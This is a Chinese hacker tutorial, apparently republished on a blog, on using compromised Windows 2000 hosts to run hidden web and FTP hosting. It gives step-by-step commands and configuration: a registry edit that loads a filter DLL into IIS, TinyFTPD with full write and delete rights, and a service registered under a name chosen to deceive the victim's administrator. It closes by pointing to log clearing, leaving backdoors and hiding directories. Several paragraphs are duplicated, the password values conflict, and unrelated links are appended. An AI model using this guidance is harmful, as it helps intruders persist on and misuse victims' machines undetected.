在肉鸡上构建一个完美的虚拟主机
2024-06-17 02:00:41
前一阶段rpc溢出漏洞流行的时候,我相信许多黑友手头上都储备了大量的3389肉鸡。大家都用肉鸡来做什么呢?做代理、做放黑软的ftp服务器、做网站、还是试验不同后门工具?更有无聊的人,像我整天用台湾肉鸡来申请QQ。好像这一切都玩得厌了,我来教大家玩一点新鲜的东东,用肉鸡来构建一个完美的可以隐藏的免费虚拟主机。
什么是虚拟主机呢?我在一家大规模的idc供应商的主页上查到如下定义:虚拟主机是使用特殊的软硬件技术,把一台运行在INTERNET上的主机分成一台台"虚拟"的主机,每一台虚拟主机都具有独立的域名,具有完整的Internet服务器(WWW、FTP、E-mail等)功能,虚拟主机之间完全独立,并可由用户自行管理。明白了定义,我们开工吧,在肉鸡上构建一个丝毫不逊于收费的虚拟主机。
第一,根据虚拟主机的定义,我们要有一个独立的域名。当然,这个域名不是像my.126.com那样的转向域名,而是可以和肉鸡ip地址绑定的域名。什么是绑定昵?通俗一点讲,像你有一个域名是www.hacker.com,那么你网站内所有的网页都可以用此域名指向表示,访问论坛可以用http://www.hacker.com/bbs,访问留言可以用http://www.hacker.com/guest,访问你想设的地址可以用http://www.hacker.com/你想设的url目录/等等。但是像126.com等的转向域名就不可以了,像我网站的域名是http://haiyangtop.126.com,但我无论如何不能用http://haiyangtop.126.com/bbs指向我放在任何空间上的论坛。那么独立的域名如何得到呢,难道我们要去买国际域名吗?不用的,可绑定的免费域名可以申请到的,请跟我来,打开http://www.ns.tc网站,点页面左栏的sign up now,申请一个你喜欢的域名吧。我申请的是lcx.ns.tc。
什么是虚拟主机呢?我在一家大规模的idc供应商的主页上查到如下定义:虚拟主机是使用特殊的软硬件技术,把一台运行在INTERNET上的主机分成一台台"虚拟"的主机,每一台虚拟主机都具有独立的域名,具有完整的Internet服务器(WWW、FTP、E-mail等)功能,虚拟主机之间完全独立,并可由用户自行管理。明白了定义,我们开工吧,在肉鸡上构建一个丝毫不逊于收费的虚拟主机。
第一,根据虚拟主机的定义,我们要有一个独立的域名。当然,这个域名不是像my.126.com那样的转向域名,而是可以和肉鸡ip地址绑定的域名。什么是绑定昵?通俗一点讲,像你有一个域名是www.hacker.com,那么你网站内所有的网页都可以用此域名指向表示,访问论坛可以用http://www.hacker.com/bbs,访问留言可以用http://www.hacker.com/guest,访问你想设的地址可以用http://www.hacker.com/你想设的url目录/等等。但是像126.com等的转向域名就不可以了,像我网站的域名是http://haiyangtop.126.com,但我无论如何不能用http://haiyangtop.126.com/bbs指向我放在任何空间上的论坛。那么独立的域名如何得到呢,难道我们要去买国际域名吗?不用的,可绑定的免费域名可以申请到的,请跟我来,打开http://www.ns.tc网站,点页面左栏的sign up now,申请一个你喜欢的域名吧。我申请的是lcx.ns.tc。
。不过要提醒你的是,申请的时候,最好不要用163.net的邮箱,会收不到发给你的密码的。我就申请了一个hacker.ns.tc的域名,注册是成功了,但却没有收到信,一个很好的域名做废了。申请成功后,用ns.tc发给你邮箱里的的密码登陆,在登陆后的页面里,写入你的一个肉鸡ip地址,点“renewal of an ip adress"按扭提交。
大约过几小时后,此绑定的域名就生效了,此时打开这个域名,会指向肉鸡的原有默认网站地址。我们当然不希望这样,申请的域名要指向自己放在肉鸡上的网站才可以呀。我们的工具主角登场了,银色巢穴有一款域名绑定软件,下载地址是:http://www.yscx.net/list.asp?id=71。我们先将此软件压缩包里的一个fmulti.dll和一个ff1.exe都传在肉鸡的%systemroot%system32目录下,记住一定要在这个目录下,这软件使用后才会生效;然后在肉鸡的注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters下,把Filter DLLs修改成为fmulti.dll的地址。
修改完后,再打开ff1.exe,在由上到下的输入框里依次填入域名、域名、你要放网站的目录。像我写的就是lcx.ns.tc、lcx.ns.tc和c:\winnt\system32\lcx。
输入完毕,用net命令重新启动一下W3SVC。
一切做完后,我在c:\winnt\system32\lcx目录下建一个default.htm默认首页,此首页的内容就是我网站的首页了,此时再打开lcx.ns.tc,你会发现什么?哈哈,一个绑定空间的域名生效了。在c:\winnt\system32\lcx这个目录下,我就可以放置我想放置的内容了。假如我放了一个动网论坛,位置是c:\winnt\system32\lcx\dwbbs,那么我就可以用http://lcx.ns.tc/dwbbs/index.asp直接来访问此论坛,这样访问是不是比你用转向域 名跳转后在ie地址栏里显示一大串的url地址酷很多?当然,要说明的是,我们在做这一切的前提是肉鸡是w2k系统,默认装了iis管理器,并且开了一个80端口的web服务,只有这样,我们做的绑定域名才会有效,而且我们做的虚拟主机是支持asp程序的。
第二,根据虚拟主机的定义,我们做的虚拟主机还要具有完整的Internet服务器(WWW、FTP、E-mail等)功能。此时,我们的lcx.ns.tc虚拟主机已具备了www的功能,你可以用http://lcx.ns.tc访问到的。我们再给其做上一个ftp功能,这个虚拟主机就很完美了。hotmail写了一个很小的ftp服务器TinyFTPD,目前最高版本是1.4。不过,它只是一个命令行的工具,在肉鸡上配置使用过后,如果再退出了肉鸡的话,它就不会生效了。我们还需要一个工具ntsrv,将TinyFTPD配置成服务状态来使用。我们先来了解一下TinyFTPD是如何工作的,我们将其传在肉鸡上,执行如下命令:TinyFTPD 2121 55555 lcx 12346 c:\winnt\system32\lcx all -hide。意思是说在肉鸡上建了一个ftp服务器,端口是2121,监听端口是55555,用户名是lcx,密码是123456,ftp的服务器目录是c:\winnt\system32\lcx(这里要和lcx.ns.tc的www目录对应,这样才会有虚拟主机的味道),all是具有所有的写入修改删除下载等权限,-hide指关掉cmd对话框该命令仍然执行。(详细使用方法请自行看帮助吧)。
第二,根据虚拟主机的定义,我们做的虚拟主机还要具有完整的Internet服务器(WWW、FTP、E-mail等)功能。此时,我们的lcx.ns.tc虚拟主机已具备了www的功能,你可以用http://lcx.ns.tc访问到的。我们再给其做上一个ftp功能,这个虚拟主机就很完美了。hotmail写了一个很小的ftp服务器TinyFTPD,目前最高版本是1.4。不过,它只是一个命令行的工具,在肉鸡上配置使用过后,如果再退出了肉鸡的话,它就不会生效了。我们还需要一个工具ntsrv,将TinyFTPD配置成服务状态来使用。我们先来了解一下TinyFTPD是如何工作的,我们将其传在肉鸡上,执行如下命令:TinyFTPD 2121 55555 lcx 12346 c:\winnt\system32\lcx all -hide。意思是说在肉鸡上建了一个ftp服务器,端口是2121,监听端口是55555,用户名是lcx,密码是123456,ftp的服务器目录是c:\winnt\system32\lcx(这里要和lcx.ns.tc的www目录对应,这样才会有虚拟主机的味道),all是具有所有的写入修改删除下载等权限,-hide指关掉cmd对话框该命令仍然执行。(详细使用方法请自行看帮助吧)。
明白了这些,我再来讲解用ntsrv将TinyFTPD命令如何来配置成服务启动。我们先来用记事本写一个ntsrv.ini,内容如下:
[Settings]
ServiceName = NETWORK JAVA
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine =TinyFTPD.exe 21 55555 lcx 12346 C:\winnt\system32\lcx all -hide
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
第二行的NETWORK JAVA指的是你指定的服务名,你可以起个更艺术的可以迷惑肉鸡管理员的服务名字,使其不敢轻易删掉此服务。第三行的LogEnable = 0中的0表示程序不会自动生成一个日志,如果是1就会生成一个叫ntsrv.log的文件,里面记录了服务启动及启动配置文件中的程序情况。第三行ProcCount = 1表示只有一个程序加载在服务里。第六行你已经明白了,最后一行表示程序执行时会在后台被执行,其它行一切默认即可以了。ntsrv.ini配置好了以后,我们与ntsrv.exe放在一起一块传至肉鸡的c:\winnt\system32下,执行ntsrv -install、net start "你在ntsrv.ini配置的服务名"这两个命令后,肉鸡的ftp服务器配置好了。
[Settings]
ServiceName = NETWORK JAVA
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine =TinyFTPD.exe 21 55555 lcx 12346 C:\winnt\system32\lcx all -hide
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
第二行的NETWORK JAVA指的是你指定的服务名,你可以起个更艺术的可以迷惑肉鸡管理员的服务名字,使其不敢轻易删掉此服务。第三行的LogEnable = 0中的0表示程序不会自动生成一个日志,如果是1就会生成一个叫ntsrv.log的文件,里面记录了服务启动及启动配置文件中的程序情况。第三行ProcCount = 1表示只有一个程序加载在服务里。第六行你已经明白了,最后一行表示程序执行时会在后台被执行,其它行一切默认即可以了。ntsrv.ini配置好了以后,我们与ntsrv.exe放在一起一块传至肉鸡的c:\winnt\system32下,执行ntsrv -install、net start "你在ntsrv.ini配置的服务名"这两个命令后,肉鸡的ftp服务器配置好了。
(附此两个小工具的下载地址:http://haiyangtop.uni.cc/xnzj.rar)
第三,收尾工作。我们的lcx.ns.tc的虚拟主机已经配置完毕了,如果你想再做上一个email服务器也不是不可以的,网上也有很多小巧精致的email服务器软件,像IMailt和EasyMail、ArGoSoft等等,但我觉得已经没有必要了,这个虚拟主机足够我们用的了。做完了虚拟主机,当然随之而来的工作是清除日志,打好肉鸡安全隐患的补丁,再留几个好后门了,最重要的是隐藏好你的网站目录,一般用一个"attrib +h +s 你的目录"就可以隐藏了,但这一切就不在本文的讨论范围之内了。最后,我可要提醒你,如果你有重要文件放在肉鸡的虚拟主机上,可以记得经常备份哟,丢了的话lcx可不负责。
本篇文章来源于[华盟***帝国 - 中国最权威***培训中心], 原文链接:http://www.hm112.com/n/?15831.html
第三,收尾工作。我们的lcx.ns.tc的虚拟主机已经配置完毕了,如果你想再做上一个email服务器也不是不可以的,网上也有很多小巧精致的email服务器软件,像IMailt和EasyMail、ArGoSoft等等,但我觉得已经没有必要了,这个虚拟主机足够我们用的了。做完了虚拟主机,当然随之而来的工作是清除日志,打好肉鸡安全隐患的补丁,再留几个好后门了,最重要的是隐藏好你的网站目录,一般用一个"attrib +h +s 你的目录"就可以隐藏了,但这一切就不在本文的讨论范围之内了。最后,我可要提醒你,如果你有重要文件放在肉鸡的虚拟主机上,可以记得经常备份哟,丢了的话lcx可不负责。
本篇文章来源于[华盟***帝国 - 中国最权威***培训中心], 原文链接:http://www.hm112.com/n/?15831.html
转载于:https://blog.51cto.com/dongbian/703031
在肉鸡上构建一个完美的虚拟主机相关推荐
- 如何在阿里云上构建一个合适的Kubernetes集群
摘要: 声明 本文主要介绍如何在阿里云上构建一个K8S集群的实践,只是作为参考,大家可以根据实际情况做出调整. 集群规划 在实际案例中发现,有不少同学使用了很多的小规格的ECS来构建K8S集群,这样其 ...
- 在CentOS 8上安装与配置Apache虚拟主机
实验环境 操作系统:Centos 8 web应用:apache 内网IP:192.168.3.21 shell执行:root 以root或具有sudo权限的用户身份登录执行如下操作. 主配置文件路径: ...
- php配置本地一个新的虚拟主机
php配置本地一个新的虚拟主机 找到Apache的配置文件 httpd-conf 打开该文件找到 Include conf/extra/httpd-vhosts.conf 去掉该内容前面的# 表示开启 ...
- sas模拟试验构建线性模型_在sas上构建一个有角度的Web应用程序
sas模拟试验构建线性模型 The SAS platform is unparalleled in its capability to deliver analytics across the wor ...
- Figma: 如何在 Web 上构建一个插件系统
原文:https://www.figma.com/blog/how-we-built-the-figma-plugin-system/ 翻译:https://juejin.cn/post/684490 ...
- iframe如何发送请求_【第1803期】如何在 Web 上构建一个插件系统
前言 上周末的这篇新闻[译]WebAssembly 1.0成为W3C推荐标准,也是在浏览器中运行的第四种语言不知道你注意到了吗?今日早读文章由@夏华翻译分享,本文由@刘岩推荐. 正文从这开始-- 在 ...
- Linux上构建一个RADIUS服务器详解
作为一名网络管理员,您需要为您所需管理的每个网络设备存放用于管理的用户信息.但是网络设备通常只支持有限的用户管理功能.学习如何使用Linux上的一个外部RADIUS服务器来验证用户,具体来说是通过一个 ...
- 网站设计好怎么上传到服务器的,虚拟主机上传到网站的几个步骤
虚拟主机怎么上传到网站?站长们可以利用专业的软件协助自己上传,比如专业的ftp软件,具备支持续点相传,上传,以及下载目录等等,不会将限制过长的网站剔除,还可以下载列队,可以长传到本地,显示隐形软件,或 ...
- lqc_构建基于域名的虚拟主机
基于域名的虚拟web主机 实验环境: 某公司的网站服务器使用的公网IP地址为192.168.100.150,并使用该IP地址注册两个域名www.bdqn.com和www.jbit.com.服务器中已经 ...
- Web 新租用了一个域名和虚拟主机
为了更好地验证一些想法,租了一个域名和一个虚拟主机,租期一年,耗资¥106. 域名是wawl.wang或者www.wawl.wang,都可以访问,取我爱物联网之意.目前还没有什么内容,处于备案审核阶段 ...
最新文章
- 刚刚、几秒前,时间格式化函数
- 国内maven仓库地址资源汇总
- 在windows下用vagrant建立lnmp开发环境
- Kafka权威指南 —— 读书笔记
- swiftyjson_是时候放弃SwiftyJSON了
- Nginx跨域配置及配置文件加载过程讲解
- 从0开始学心电信号处理(1)——心电信号的读取
- 51单片机仿真设计项目大全
- 这27个电源符号,还傻傻分不清楚?
- 关于Dve C++——[Warning] pointer to a function used inarithmetic
- 微信小程序:缓存wx.getStorage
- 集成VueCli5各种功能与插件(一)安装
- 数据库连接数和数据库连接池的连接数区别?
- 为了忘却的纪念---番茄花园 Windows XP 下载地址合集
- drf 安装_drf 生成接口文档
- vector sort 出现异常处理--std::sort(_RanIt,_RanIt,_Pr)
- 深入理解DOM事件类型系列第三篇——变动事件
- 无线网络渗透-1: 802.11 AP扫描
- 广州市黄埔区科技局关于开展区配套科技项目逾期未验收项目清理工作的通知
- IDV客户端下发界面会出现“获取磁盘信息失败”
热门文章
- 当滚动条滚动到页面底部自动加载增加内容 ajax,Selenium-完整的ajax加载自动滚动到页面底部...
- tkintergui-pack布局内容1
- mysql_query 资源标识符_PHP mysql_query() 函数解析
- c语言多xml文件操作,c语言 C#中对XML文件的操作.doc
- java递归求和 1 n_Java递归求和1+2+3+...+n实例详解
- python查找字符串出现次数_python实现从字符串中找出字符1的位置以及个数的方法...
- JDK动态代理在RPC框架中的应用
- 这次是16.7亿元!新能源汽车骗补何时休?
- 一道笔试题的解法和联想
- 站在巨人的肩膀上学习Android开发